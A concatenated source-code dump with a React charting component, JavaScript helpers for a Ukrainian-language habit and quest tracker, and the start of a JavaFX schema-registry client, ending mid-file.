toast('Graph Saved', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
if (!dataset.awsId) {
toast('Dataset Saved', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
}
})
.catch(err => {
console.error(err);
const errorButton = document.getElementById("error-button");
errorButton.click();
})
}
render() {
const {
dataset,
graphSettings,
handleXCategory,
handleYCategory
} = this.props
const { currentX, currentY } = graphSettings
const columnObj = dataset.dataset.length > 0 ? dataset.columnObj : {}
const xAxis = Object.keys(columnObj)
const yAxis = xAxis.filter(key => {
return (
columnObj[key].toLowerCase() === 'number' ||
columnObj[key].toLowerCase() === 'percent'
)
})
const columns = xAxis.map(column => {
return {
Header: column,
accessor: column,
width: 'auto'
}
})
const displayScatter =
currentY.length > 0 && currentX && yAxis.includes(currentX)
const displayGroup = currentY.length > 0 && currentX
const displayRadar =
currentY.length > 0 && currentX && !yAxis.includes(currentX)
const displayPie =
currentY.length === 0 && currentX && !yAxis.includes(currentX)
const recommendation = displayScatter
? 'A Scatter Chart may be best for this data'
: displayPie
? 'A Pie Chart may be best for this data'
: displayGroup ? 'A Bar Chart may be best for this data' : null
return (
<div id="graph-dataset">
{NotLoggedInErrorPopup(<button id="error-button" style={{ display: "none" }}></button>, this.props.location.pathname)}
<div id="graph-dataset-table-container">
<h1 id="graph-dataset-table-container-name">{dataset.name}</h1>
{!!dataset.dataset.length &&
xAxis.length && (
<div id="graph-dataset-table-container-table">
<ReactTable
data={dataset.dataset}
columns={columns}
defaultPageSize={5}
/>
</div>
)}
</div>
<div id="graph-dataset-select">
<h1 id="graph-dataset-select-name">Select which data to graph</h1>
{!!dataset.dataset.length && (
<div>
<div className="graph-dataset-headers">
<div id="graph-dataset-select-x-y">
<div>
<h3>X Axis Data</h3>
<select
className="graph-dataset-select-x-y-input"
onChange={handleXCategory}
>
<option hidden>choose X</option>
{xAxis.map(xCategory => (
<option key={xCategory}>{xCategory}</option>
))}
</select>
</div>
<div>
<div className="graph-dataset-select-y">
<h3>Y Axis Data</h3>
<button
id="graph-dataset-select-y-add"
onClick={this.addYCategory}
>
+
</button>
</div>
{this.state.yCategQuantity.map((n, idx) => {
return (
<div className="graph-dataset-select-y" key={idx}>
<select
className="graph-dataset-select-x-y-input"
onChange={e => handleYCategory(e.target.value, idx)}
>
<option hidden>choose Y</option>
{yAxis.map(yCategory => (
<option key={yCategory}>{yCategory}</option>
))}
</select>
<button
id="graph-dataset-select-y-delete"
onClick={() => this.handleDeleteY(idx)}
>
x
</button>
</div>
)
})}
</div>
</div>
<div id="graph-dataset-message">
<div id="click-message">
<h2>Choose Your Favorite Graph</h2>
<p>
<strong>Recommendation: </strong>
{recommendation}
</p>
<p>
Upon click your <strong>Dataset</strong> is going to be
saved automaticly
</p>
<p>
Upon click your <strong>Graph</strong> is going to be
saved automaticly
</p>
</div>
</div>
</div>
<div className="graph-dataset-graphs">
<div
id="Scatter-graph"
onClick={() => this.handleGraphClick('Scatter')}
className="graph-dataset-single-container"
style={{ display: displayScatter ? 'inline' : 'none' }}
>
<ScatterChartGraph />
</div>
<div
id="Line-graph"
onClick={() => this.handleGraphClick('Line')}
className="graph-dataset-single-container"
style={{ display: displayGroup ? 'inline' : 'none' }}
>
<LineChartGraph />
</div>
<div
id="Bar-graph"
onClick={() => this.handleGraphClick('Bar')}
className="graph-dataset-single-container"
style={{ display: displayGroup ? 'inline' : 'none' }}
>
<BarChartGraph />
</div>
<div
id="Radar-graph"
onClick={() => this.handleGraphClick('Radar')}
className="graph-dataset-single-container"
style={{ display: displayRadar ? 'inline' : 'none' }}
>
<RadarChartGraph />
</div>
<div
id="Area-graph"
onClick={() => this.handleGraphClick('Area')}
className="graph-dataset-single-container"
style={{ display: displayGroup ? 'inline' : 'none' }}
>
<AreaChartGraph />
</div>
<div
id="Pie-graph"
onClick={() => this.handleGraphClick('Pie')}
className="graph-dataset-single-container"
style={{ display: displayPie ? 'inline' : 'none' }}
>
<PieChartGraph />
</div>
</div>
</div>
)}
</div>
</div>
)
}
}
const mapState = state => {
return {
dataset: state.dataset,
graphSettings: state.graphSettings,
user: state.user
}
}
const mapDispatch = dispatch => ({
handleXCategory: event => {
dispatch(setXAxis(event.target.value))
},
handleYCategory(yAxis, idx) {
dispatch(addYAxis(yAxis, idx))
},
deleteY(idx) {
dispatch(deleteYAxis(idx))
}
})
export default connect(mapState, mapDispatch)(GraphDataset)
<file_sep>const User = require('./user')
const Graph = require('./graph')
const YAxis = require('./yAxis')
const Dataset = require('./dataset')
User.hasMany(Graph);
Graph.belongsTo(User);
User.hasMany(Dataset);
Dataset.belongsTo(User);
Dataset.hasMany(Graph);
Graph.belongsTo(Dataset);
Graph.hasMany(YAxis);
YAxis.belongsTo(Graph);
module.exports = {
User,
Graph,
YAxis,
Dataset
}
<file_sep>
export function datasetColumnFormatter(dataset, columnObj) {
//only columns that are numbers
let columnKeys = Object.keys(columnObj).filter(key => {
return columnObj[key].toLowerCase() === 'number';
});
//mutate those values into numbers
for (let j = 0; j < dataset.length; j++){
for (let i = 0; i < columnKeys.length; i++){
dataset[j][columnKeys[i]] = Number(dataset[j][columnKeys[i]]);
}
}
let newDataset = [...dataset];
if(newDataset.length > 30) {
newDataset.splice(30, newDataset.length-30)
}
//add the columnObj onto the dataset
return {dataset: filteringSizeDataset(dataset), columnObj}
}
//change uploaded data from array of arrays into an array of objects
export function uploadedDataFormatter(dataset) {
let columnNames = dataset[0];
let columnObj = {};
dataset[1].forEach((el, i) => {
if (isNaN(+el)) {
columnObj[columnNames[i]] = 'text';
} else {
columnObj[columnNames[i]] = 'number';
}
});
let newDataset = dataset.slice(1).map(dataArr => {
let obj = {};
dataArr.forEach((data, i) => {
obj[columnNames[i]] = data;
})
return obj;
});
return datasetColumnFormatter(newDataset, columnObj);
}
export function filteringSizeDataset(dataset) {
//setting maximun num of rows to 30
let maxRows = 30;
let newDataset = [...dataset];
if(newDataset.length > maxRows) {
newDataset.splice(maxRows, newDataset.length-maxRows)
}
return newDataset;
}
| 2bff74928d88dd168025c9bcf5e5470365bda84a | [
"JavaScript",
"Markdown"
] | 21 | JavaScript | Graphitti/graphify | c1667cc65a2c7f6efb6391683dddec8ba86d0b98 | 34bd0ea91189d4a1de750e07d4f9756d4798d68c |
refs/heads/master | <file_sep>
const segundero = document.querySelector('.segundos');
const minutero = document.querySelector('.minutos');
const horero = document.querySelector('.hora');
function setDate () {
const now = new Date();
const segundos = now.getSeconds();
const gradosSegunods = ((segundos/60) * 360) + 90;
segundero.style.transform = `rotate(${gradosSegunods}deg)`;
const minutos = now.getMinutes();
const gradosMinutos = ((minutos/60) * 360) + 90;
minutero.style.transform = `rotate(${gradosMinutos}deg)`;
const hora = now.getHours();
const gradosHora = ((hora/24) * 360) + 90;
horero.style.transform = `rotate(${gradosHora}deg)`;
}
setInterval(setDate, 1000); | ee7543be659b83d7b13d94428aef428cad4f0b3d | [
"JavaScript"
] | 1 | JavaScript | tomas-ezama/JS30 | 3f4ea3632a784d73cbc14e5f9eec818fcb744c81 | dabdc460615f3c5abb0d69e2ca7cd1a9f390af9d |
refs/heads/master | <file_sep>questInfoModal.firstElementChild.onclick = () => {
showActivityInfoModal(questInfoModal.firstElementChild.dataset.id)
questInfoGlass.hidden = true
}
questInfoModal.querySelector('ul').onclick = event => {
if (event.target.tagName == 'BUTTON') {
const status = event.target.innerText == '✔️'? 'done' : 'failed'
const todoID = event.target.closest('li').dataset.id
const {questID} = todos.find(todo => todo.id == todoID)
const quest = quests.find(quest => quest.id == questID)
setTodoStatus(todoID, status)
showConfidence()
showActivities()
showQuests()
prepQuestInfoModal(quest)
if (quest.status == 'done')
event.currentTarget.lastElementChild.scrollIntoView({behavior:'smooth'})
}
}
// функція для підготовки значень діяльності та квесту в розмітку модалки "деталі"
function prepQuestInfoModal(quest) {
const activity = activities.find(activity => activity.id == quest.activityID)
questInfoModal.firstElementChild.dataset.id = activity.id
const spans = questInfoModal.querySelectorAll('div>span')
spans[0].innerText = activity.name
spans[1].innerText = activity.size
spans[2].innerText = quest.confidence/quest.total
spans[3].innerText = isoToGOST(quest.from)
spans[4].innerText = isoToGOST(quest.to)
spans[5].innerText = quest.progress
spans[6].innerText = quest.total
spans[7].innerText = quest.confidence
spans[8].innerText = quest.status == 'done' ? '✔️' : quest.status == 'failed' ? '❌' : ''
spans[9].innerText = statusUKR[quest.status]
showQuestTodos(quest)
}
// функція для показу даних квесту та діяльності в модалці деталей
function showQuestInfoModal(questID) {
const quest = quests.find(quest => quest.id == questID)
prepQuestInfoModal(quest)
questInfoGlass.hidden = false
}
// побудова елементу списку звітів по датам
function buildQuestTodoItem(todo, i, todos) {
return `
<li class="${todo.status}" data-id="${todo.id}">
<span>
${todo.status == 'done' ? '✔️'
: (todo.status == 'failed' ? '❌'
: i && todos[i-1].status != 'done' || todo.date > dateToISO(new Date) ? ''
: '<span><button>✔️</button><button>❌</button></span>')}
</span>
<span>${isoToWeekDay(todo.date)}</span>
<span>+${todo.confidence}</span>
</li>
`
}
// функція для показу списку всіх виконань в рамках квесту
function showQuestTodos(quest) {
const questTodos = todos.filter(todo => todo.questID == quest.id)
questInfoModal.querySelector('ul').innerHTML = questTodos.map(buildQuestTodoItem).join('')
}
<file_sep>let overdueTodos = []
let groupedOverdueTodos = {}
// закриваємо модальне вікно звітів
reportGlass.onclick = event => {
if (event.target == reportGlass || event.target.classList.contains('close'))
reportGlass.hidden = true
}
// клік на кнопку Звіти
reportBtn.onclick = () => {
selectOverdueTodos()
showOverdueTodos()
if (!overdueTodos.length) {
overdueTodoList.innerHTML = '<center>Відмінно! Прострочених звітів немає</center>'
}
showReportModal()
// клік по елементах списку прострочених планів
overdueTodoList.onclick = event => {
if (event.target.tagName == 'BUTTON') {
const status = event.target.innerText == '✔️'? 'done' : 'failed'
setTodoStatus(event.target.closest('li').dataset.id, status)
showConfidence()
showOverdueTodos()
showQuests()
showActivities()
}
}
}
//функція для показу модального вікна зі списком прострочених завдань
function showReportModal() {
reportGlass.hidden = false
}
// функція для вибірки планів, у яких статус за попередні дні залишився 'planned'
function selectOverdueTodos() {
const today = dateToISO(new Date)
overdueTodos = todos.filter(todo => todo.status == 'planned' && todo.date < today)
overdueTodos.sort((a, b) => {
if (a.date < b.date) return -1
//if (a.date > b.date) return 1 для експерименту!!!
})
groupedOverdueTodos = {}
const dates = [...new Set(overdueTodos.map(todo => todo.date))]
for (const date of dates) {
groupedOverdueTodos[date] = overdueTodos.filter(todo => todo.date == date)
}
}
// функція для побудови розмітки хтмл зі списком прострочених планів
function buildOverdueTodoItem(todo) {
const quest = quests.find(quest => quest.id == todo.questID)
const activity = activities.find(activity => activity.id == quest.activityID)
const first = overdueTodos.find(otherTodo => otherTodo.questID == todo.questID &&
otherTodo.status == 'planned') == todo
return `
<li class="${todo.status}" data-id="${todo.id}">
${todo.status == 'done' ? '<span>✔️</span>'
: todo.status == 'failed' ? '<span>❌</span>'
: first ? '<span><button>✔️</button><button>❌</button></span>' : ''}
${todo.status == 'planned' ? '' : '<div></div>'}
<span>${activity.name}</span>
<span>${activity.size}</span>
<span>+${todo.confidence}</span>
</li>
`
}
// функція для виводу прострочених планів
function showOverdueTodos() {
const overdueTodoList = document.getElementById('overdueTodoList')
let html = ''
for (const date in groupedOverdueTodos) {
if (!groupedOverdueTodos.hasOwnProperty(date)) continue
const todos = groupedOverdueTodos[date]
html += `
<li>
<h3>${isoToGOST(date)}</h3>
<ul class="todos">
${todos.map(todo => buildOverdueTodoItem(todo, overdueTodos)).join('')}
</ul>
</li>
`
}
overdueTodoList.innerHTML = html
}<file_sep>activityInfoGlass.onclick = event => {
if (event.target == activityInfoGlass || event.target.classList.contains('close'))
activityInfoGlass.hidden = true
else if (event.target.classList.contains('save')) {
if (updateActivity(activityInfoModal.querySelector('.save').dataset.id)) {
showActivities()
showQuests()
activityInfoGlass.hidden = true
}
}
}
activityInfoModal.querySelector('ul').onclick = event => {
const questItem = event.target.closest('li')
if (questItem) showQuestInfoModal(questItem.dataset.id)
}
// функція для підготовки модального вікна при натисканні кнопки Деталі
function prepActivityInfoModal(activity) {
const inputs = activityInfoModal.querySelectorAll('input')
inputs[0].value = activity.name
inputs[1].value = activity.size
inputs[2].value = activity.diff
const activityQuests = quests.filter(quest => quest.activityID == activity.id)
activityInfoModal.querySelector('ul').innerHTML =
activityQuests.map(buildActivityQuest).join('')
activityInfoModal.querySelector('.save').dataset.id = activity.id
}
// функція для показу модального вікна при натисканні Деталі
function showActivityInfoModal(activityID) {
const activity = activities.find(activity => activity.id == activityID)
prepActivityInfoModal(activity)
activityInfoGlass.hidden = false
}
//функція для побудови розмітки деталей квесту
function buildActivityQuest(quest) {
return `
<li data-id="${quest.id}">
<details>
<summary>
<span title="дата початку">з ${isoToGOST(quest.from)}</span>
<span title="можлива дата завершення">по ${isoToGOST(quest.to)}</span>
<span><span title="кількість днів виконання позаду">${quest.progress}/</span>
<span title="передбачена тривалість квесту">${quest.total} днів</span></span>
<span title="завдаток/винагорода по завершенню">${quest.confidence}</span>
<span title="статус квесту">${statusUKR[quest.status]}</span>
</summary>
</details>
</li>
`
}
//функція для перевірки інпутів та оновлення значень дыяльності
function updateActivity(activityID) {
//const inputs = [...activityInfoModal.querySelectorAll('input')]
const inputs = activityInfoModal.querySelectorAll('input')
const activity = activities.find(activity => activity.id == activityID)
if (inputs[0].value == activity.name &&
inputs[1].value == activity.size &&
inputs[2].value == activity.diff) return true
//if (inputs.some(input => input.value == '')) alert('Заповніть пусті поля')
if ([inputs[0].value, inputs[1].value, inputs[2].value].includes('')) {
showAlert('Заповніть пусті поля')
return false
}
activity.name = inputs[0].value
activity.size = inputs[1].value
const diff = Math.min(Math.max(1, +inputs[2].value), 10)
activity.diff = diff
localStorage.activities = JSON.stringify(activities)
return true
}
<file_sep>// вхідні дані, збережені в локалсторедж
// масив обєктів для зберігання видів діяльності
// масив обєктів для зберігання квестів
// плани на виконання квесту
// пов'язуємо всі дані між собою
if (location.hostname !== '127.0.0.1') { // локалсторедж з хостингу гіта
if (!localStorage.nextID ||
!localStorage.confidence ||
!localStorage.activities ||
!localStorage.quests ||
!localStorage.todos) {
localStorage.nextID = '12'
localStorage.confidence = ''
localStorage.activities = JSON.stringify([])
localStorage.quests = JSON.stringify([])
localStorage.todos = JSON.stringify([])
}
} else { // локальний локалсторедж
if (!localStorage.nextID ||
!localStorage.confidence ||
!localStorage.activities ||
!localStorage.quests ||
!localStorage.todos) {
localStorage.nextID = '12'
localStorage.confidence = '50'
localStorage.activities = JSON.stringify([
{id: 1, name: 'Програмування', size: '2 години', diff: 2},
{id: 2, name: 'Англійська', size: '2 години', diff: 5},
{id: 3, name: 'Фізкультура', size: '1 година', diff: 9},
])
localStorage.quests = JSON.stringify([
{id: 4, activityID: 1, from: '2020-10-04', to: '2020-10-10',
progress: 4, total: 7, confidence: 14, status: 'ongoing'},
])
localStorage.todos = JSON.stringify([
{id: 5, questID: 4, date: '2020-10-04', confidence: 1, status: 'done', n: 1},
{id: 6, questID: 4, date: '2020-10-05', confidence: 1, status: 'done', n: 2},
{id: 7, questID: 4, date: '2020-10-06', confidence: 1, status: 'done', n: 3},
{id: 8, questID: 4, date: '2020-10-07', confidence: 2, status: 'done', n: 4},
{id: 9, questID: 4, date: '2020-10-08', confidence: 2, status: 'planned', n: 5},
{id: 10, questID: 4, date: '2020-10-09', confidence: 2, status: 'planned', n: 6},
{id: 11, questID: 4, date: '2020-10-10', confidence: 2, status: 'planned', n: 7},
])
}
}
// початкове визначення віри в себе
if (!localStorage.etap) {
showPrompt('Оцініть віру в себе за десятибальною шкалою: ', 'number', (answer) => {
if (+answer < 2) {
showAlert('Вибачте, ми не можемо взяти на себе відповідальність. З такою низькою вірою в себе зверністься до психолога')
return false
}
if (+answer > 10) answer = 10
localStorage.confidence = answer
localStorage.etap = answer
showConfidence()
return true
})
}
//створюємо змінну в ОЗУ для діяльностей
let activities = JSON.parse(localStorage.activities)
//створюємо змінну в ОЗУ для квестів
let quests = JSON.parse(localStorage.quests)
//створюємо змінну в ОЗУ для планів
let todos = JSON.parse(localStorage.todos)<file_sep>
// закриваэмо модальне вікно для планів квесту
todoGlass.onclick = event => {
if (event.target == todoGlass || event.target.innerText == 'Ok') {
todoGlass.hidden = true
}
}
// клік
showTodoBtn.onclick = () => {
showTodoToday()
if (!todoList.children.length) {
todoList.innerHTML = '<center>Планів на сьогодні немає. Варто взяти квест</center>'
}
showTodoModal()
}
//клік на кнопку ок чи фолс
todoList.onclick = event => {
if (event.target.tagName == 'BUTTON') {
const status = event.target.innerText == '✔️'? 'done' : 'failed'
setTodoStatus(event.target.closest('li').dataset.id, status)
showConfidence()
showTodoToday()
showQuests()
showActivities()
}
}
// функція для показу модального вікна з планами на сьогодні
function showTodoModal() {
todoGlass.hidden = false
}
// функція для побудови елементу списку планів
function buildTodoItem(todo) {
const quest = quests.find(quest => quest.id == todo.questID)
const activity = activities.find(activity => activity.id == quest.activityID)
return `
<li class="${todo.status}" data-id="${todo.id}">
${todo.status == 'done' ? '<span>✔️</span>'
: (todo.status == 'failed' ? '<span>❌</span>'
: '<span><button>✔️</button><button>❌</button></span>')}
${todo.status == 'planned' ? '' : '<div></div>'}
<span>${activity.name}</span>
<span>${activity.size}</span>
<span>+${todo.confidence}</span>
</li>
`
}
// функція для виводу планів на сьогодні
function showTodoToday() {
todoList.innerHTML = todos.filter(todo => {
const date = new Date
if (todo.date != dateToISO(date)) return
else if (todo.status !== 'failed') return true
const quest = quests.find(quest => quest.id == todo.questID)
//const yesterday = new Date(date - 86400000)
date.setDate(date.getDate() - 1)
const alreadyFailed = todos.find(todo => todo.questID == quest.id
&& todo.date == (dateToISO(date)) && todo.status == 'failed')
return !alreadyFailed
})
.map(buildTodoItem).join('')
}
// функція для зміни статусу плану і кількості очок
function setTodoStatus(todoID, status) {
const todo = todos.find(todo => todo.id == todoID)
todo.status = status
const quest = quests.find(quest => quest.id == todo.questID)
if (status == 'done') {
quest.progress++
confidence(todo.confidence)
updateQuestStatus(quest)
populateQuestTodos(quest)
} else {
const canceledTodos = todos.filter(todo => todo.questID == quest.id && todo.status == 'planned')
canceledTodos.forEach(todo => todo.status = 'failed')
if (quest.status != 'ongoing') todos = todos.filter(todo => !canceledTodos.includes(todo))
updateQuestStatus(quest)
}
localStorage.todos = JSON.stringify(todos)
}
//функція для зміни статусу квесту в залежності від плану
function updateQuestStatus(quest /* or quest.id */) {
//якщо передали не обэкт квесту то тоді це його айді
if (typeof quest != 'object') quest = quests.find(q => q.id == quest)
if (quest.status != 'ongoing' ) return quest.status
if (quest.progress >= quest.total) {
confidence(quest.confidence)
quest.status = 'done'
const activity = activities.find(activity => activity.id == quest.activityID)
if (quest.total >= +localStorage.etap &&
activity.diff >= quest.confidence/quest.total &&
activity.diff > 1) {
activity.diff--
localStorage.activities = JSON.stringify(activities)
}
}
else if (todos.some(todo => todo.questID == quest.id && todo.status == 'failed')) {
quest.status = 'failed'
const activity = activities.find(activity => activity.id == quest.activityID)
if (activity.diff <= quest.confidence/quest.total) {
activity.diff++
localStorage.activities = JSON.stringify(activities)
}
}
localStorage.quests = JSON.stringify(quests)
return quest.status
}
//функція для створення нових todo для quest
function populateQuestTodos(quest) {
const questTodos = todos.filter(todo => todo.questID == quest.id)
if (!quest.progress && !questTodos.length) {
addNewTodos(quest)
} else if (quest.status == 'done' && questTodos.every(todo => todo.status == 'done')) {
continueInertia(questTodos)
}
}
function addNewTodos(quest) {
const diff = quest.confidence/quest.total
const date = new Date(quest.from)
date.setDate(date.getDate() - 1)
const yesterdayTodos = todos.filter(todo => todo.date == dateToISO(date) && todo.status == 'done')
const lastTodo = yesterdayTodos.find(todo => {
const q = quests.find(quest => quest.id == todo.questID)
return quest.activityID == q.activityID
})
const n = lastTodo?.n || 0
for (let i = 0; i < quest.total; i++) {
const date = new Date(quest.from)
if (!i) {
const activityQuestsIDs = quests.filter(q => q.activityID == quest.activityID)
.map(quest => quest.id)
const inertiaTodo = todos.findIndex(todo => todo.date == dateToISO(date) &&
activityQuestsIDs.includes(todo.questID) && todo.status == 'planned')
if (inertiaTodo !== -1)
todos.splice(inertiaTodo, 1)
}
date.setDate(date.getDate() + i)
const newTodo = {
id: newID(),
questID: quest.id,
date: dateToISO(date),
confidence: Math.min(diff, Math.floor((i + n + 1) ** 0.5)),
status: 'planned',
n: i + n + 1,
}
todos.push(newTodo)
}
localStorage.todos = JSON.stringify(todos)
}
function continueInertia(questTodos) {
const lastTodo = questTodos[questTodos.length - 1]
const date = new Date(lastTodo.date)
date.setDate(date.getDate() + 1)
const newTodo = { ...lastTodo, id: newID(), date: dateToISO(date), status: 'planned' }
todos.push(newTodo)
if (newTodo.date < dateToISO(new Date)) {
overdueTodos.push(newTodo)
overdueTodos.sort((a, b) => a.date < b.date ? -1 : 1)
groupedOverdueTodos[newTodo.date] =
[...groupedOverdueTodos[newTodo.date] || [], newTodo]
}
localStorage.todos = JSON.stringify(todos)
}
<file_sep>
Date.customTimeline = function ({
current = new Date('Oct 21 2015 04:29 pm'), // 'Back to the Future' Day
updInterval = 77,
speed = 1,
running = true
} = {}) {
current = +current
let stickMoment, stickPoint
let updTimer = 0
let updCount = 0
// reset the point to measure the time from it
const stickNow = () => {
stickMoment = Date.now()
stickPoint = current
}
const update = () => {
const now = Date.now()
current = stickPoint + (now - stickMoment) * speed
timeline.dispatchEvent( new CustomEvent('update', {detail: timeline.now}) )
return ++updCount
}
const shift = (diff) => {
if (typeof diff != 'number') return false
current += diff
stickNow()
if (running) run()
else update()
return current
}
const run = () => {
if (!running) stickNow()
update()
clearInterval(updTimer)
updTimer = setInterval(update, updInterval)
timeline.dispatchEvent( new Event('run') )
running = true
}
const freeze = () => {
if (running) {
update()
clearInterval(updTimer)
stickNow()
running = false
timeline.dispatchEvent( new Event('freeze') )
}
}
const timeline = new EventTarget
Object.assign(timeline, {update, shift, run, freeze})
Object.defineProperties(timeline, {
now: {
get: () => new Date(current),
set(date) {
current = +date
stickNow()
if (running) run()
else update()
return date
}
},
updInterval: {
get: () => updInterval,
set(interval) {
clearInterval(updTimer)
updInterval = interval
if (running) run()
return interval
}
},
speed: {
get: () => speed,
set(multiplier) {
clearInterval(updTimer)
speed = multiplier
stickNow()
if (running) run()
return multiplier
}
},
updCount: {
get: () => updCount,
set: count => updCount = count
},
running: {
get: () => running
}
})
stickNow()
if (running) run()
return timeline
}
tl = Date.customTimeline({current: new Date(2020,9,19)})
DateOriginal = Date
Date = function Date(...args) {
return args.length ? new DateOriginal(...args) : tl.now
}
Object.setPrototypeOf(Date, DateOriginal)<file_sep>//обєкт для перетворення статусу з інгл на укр
const statusUKR = {done: 'завершено', ongoing: 'триває', failed: 'провалено'}
const weekDaysUKR = ['нд', 'пн', 'вт', 'ср', 'чт', 'пт', 'сб']
// вивід списку діяльностей
function showActivities() {
activityList.innerHTML = activities.filter(activity => !activity.archived)
.map(buildActivityItem).join('')
activityList.querySelectorAll('details').forEach(element => {
element.ontoggle = closeOtherDetails
});
activityList.querySelectorAll('button').forEach(btn => {
const label = btn.innerText.trim()
if (label == 'Взяти квест') {
btn.onclick = () => {
if (confidence() >= +btn.dataset.diff) showGetQuestModal(btn.parentElement.dataset.id)
else showAlert('Недостатньо віри в себе на цей квест')
}
} else if (label == 'Деталі') {
btn.onclick = () => {
showActivityInfoModal(btn.parentElement.dataset.id)
}
} else if (label == 'В архів') {
btn.onclick = () => {
moveToArchive(btn.parentElement.dataset.id)
showActivities()
}
}
})
}
// вивід списку квестів
function showQuests() {
questList.innerHTML = quests.filter(quest => !quest.archived)
.map(buildQuestItem).join('')
questList.querySelectorAll('details').forEach(element => {
element.ontoggle = closeOtherDetails
});
questList.querySelectorAll('button').forEach(btn => {
const label = btn.innerText.trim()
if (label == 'В архів') {
btn.onclick = () => {
moveToArchive(btn.dataset.id)
showQuests()
}
}
if (label == 'Деталі') {
btn.onclick = () => {
showQuestInfoModal(btn.dataset.id)
}
}
})
}
// вивід показника віри в себе на екрані
function showConfidence() {
confidenceView.innerText = confidence()
}
// функція для запису дати у стандартному форматі ISO
function dateToISO(dateObject) {
const year = dateObject.getFullYear()
let month = dateObject.getMonth()+1
if (month < 10) month = '0' + month
let date = dateObject.getDate()
if (date < 10) date = '0' + date
return `${year}-${month}-${date}`
}
// функція для запису дати iso у форматі ГОСТ
function isoToGOST(isoDate) {
const [year, month, date] = isoDate.split('-')
return `${date}.${month}.${year}`
}
// функція для витягування дня з дати
function isoToWeekDay(isoDate) {
const dateObj = new Date(isoDate)
const date = dateObj.getDate()
const weekDay = weekDaysUKR[dateObj.getDay()]
return `${date}, ${weekDay}`
}
// функція для інформування про щось
function showAlert(msg) {
alertMsg.innerText = msg
alertGlass.hidden = false
}
//функція для запису віри в себе
function showPrompt(msg, type, handler) {
promptMsg.innerText = msg
promptInp.type = type
promptGlass.hidden = false
promptModal.querySelector('button').onclick = () => {
if (handler(promptInp.value)) promptGlass.hidden = true
}
}
// функція для показу актуальної дати та часу
function showDateTime() {
dateTimeView.innerHTML = `<div>${getCurrentDate()}</div><h3>${getCurrentTime()}</h3>`
}
function showTodoCount() {
showTodoBtn.dataset.count = todos.filter(todo =>
todo.date == dateToISO(new Date) && todo.status == 'planned').length
reportBtn.dataset.count = todos.filter(todo =>
todo.date < dateToISO(new Date) && todo.status == 'planned').length
}
// функція для визначення поточної дати
function getCurrentDate() {
return isoToGOST(dateToISO(new Date))
}
// функція для визначення поточного часу
function getCurrentTime() {
const date = new Date
let hour = date.getHours()
let minute = date.getMinutes()
if (hour < 10) hour = '0' + hour
if (minute < 10) minute = '0' + minute
return `${hour}:${minute}`
}
//функція для створення id з локалстореджа
function newID() {
const nextID = +localStorage.nextID
localStorage.nextID = nextID + 1
return nextID
}
//функція для читання, редагування показника віри в себе у локалсторедж
function confidence(value) {
let confidence = +localStorage.confidence
if (value === undefined) return confidence
confidence += value
localStorage.confidence = confidence
}
| f572be085bf29140fea2a9ecc29469f36ce9920a | [
"JavaScript"
] | 7 | JavaScript | SerhiiShymchuk/pacer | 868f72915a5880e2ba2718a9b5e6d0ef635f0c6e | 6e2d61e70f8ffee9fc5d90d4369a836879da5f89 |
refs/heads/master | <file_sep>package regfx.model;
import javafx.collections.FXCollections;
import javafx.collections.MapChangeListener;
import javafx.collections.ObservableMap;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.logging.Logger;
import java.util.prefs.BackingStoreException;
import java.util.prefs.Preferences;
import java.util.stream.Collectors;
public class MainModel {
private final static String URLS = "URLs";
private Preferences userUrlsNode = Preferences.userNodeForPackage(MainModel.class).node(URLS);
private Logger log = Logger.getLogger("regfx");
private ObservableMap<String, Map<String, String>> observablePreferences = FXCollections.observableMap(new HashMap<>());
public MainModel() {
addPreferencesListener((MapChangeListener<? super String, ? super Map<String, String>>) chg -> {
if (chg.wasAdded()) {
setNode(chg.getKey(), chg.getValueAdded());
} else if (chg.wasRemoved()) {
removeNode(chg.getKey());
}
try {
savePreferences();
} catch (BackingStoreException e) {
log.throwing(this.getClass().getPackageName(), "MainModel", e);
}
});
}
public void addPreferencesListener(MapChangeListener<? super String, ? super Map<String, String>> listener) {
observablePreferences.addListener(listener);
}
private void readNode(String nodeName) {
try {
Preferences nodeForUrl = userUrlsNode.node(nodeName);
Map<String, String> props = Arrays.stream(nodeForUrl.keys())
.collect(Collectors.toMap(
Function.identity(),
key -> nodeForUrl.get(key, "")
));
addPreferences(nodeName, props);
} catch (BackingStoreException e) {
log.throwing(this.getClass().getPackageName(), "readNode", e);
}
}
private void setNode(String nodeName, Map<String, String> props) {
Preferences nodeForUrl = userUrlsNode.node(nodeName);
props.forEach(nodeForUrl::put);
}
private void removeNode(String nodeName) {
try {
userUrlsNode.node(nodeName).removeNode();
} catch (BackingStoreException e) {
log.throwing(this.getClass().getPackageName(), "MainModel", e);
}
}
private void savePreferences() throws BackingStoreException {
userUrlsNode.flush();
}
public void readPreferences() throws BackingStoreException {
Arrays.stream(userUrlsNode.childrenNames()).forEach(this::readNode);
}
public void addPreferences(String key, Map<String, String> props) {
observablePreferences.put(key, props);
}
public void removePreferences(String key) {
observablePreferences.remove(key);
}
}
<file_sep>/**
* Sample Skeleton for 'regfx-main.fxml' Controller Class
*/
package regfx;
import com.hortonworks.registries.schemaregistry.SchemaBranch;
import com.hortonworks.registries.schemaregistry.SchemaMetadataInfo;
import com.hortonworks.registries.schemaregistry.SchemaVersionInfo;
import com.hortonworks.registries.schemaregistry.utils.ObjectMapperUtils;
import javafx.application.Platform;
import javafx.beans.binding.Bindings;
import javafx.beans.property.ReadOnlyObjectProperty;
import javafx.collections.MapChangeListener;
import javafx.event.ActionEvent;
import javafx.fxml.FXML;
import javafx.scene.control.ChoiceBox;
import javafx.scene.control.Label;
import javafx.scene.control.Menu;
import javafx.scene.control.MenuItem;
import javafx.scene.control.TableColumn;
import javafx.scene.control.TableView;
import javafx.scene.control.cell.MapValueFactory;
import regfx.dialogs.Dialogs;
import regfx.model.MainModel;
import regfx.model.SchemaBranches;
import regfx.model.SchemaEnum;
import regfx.model.SchemaModel;
import regfx.model.SchemaVersions;
import regfx.model.Schemas;
import regfx.model.VersionEnum;
import regfx.model.VersionModel;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.util.EnumMap;
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;
import java.util.ResourceBundle;
import java.util.logging.Logger;
import java.util.prefs.BackingStoreException;
public class MainController {
private Logger log = Logger.getLogger("regfx");
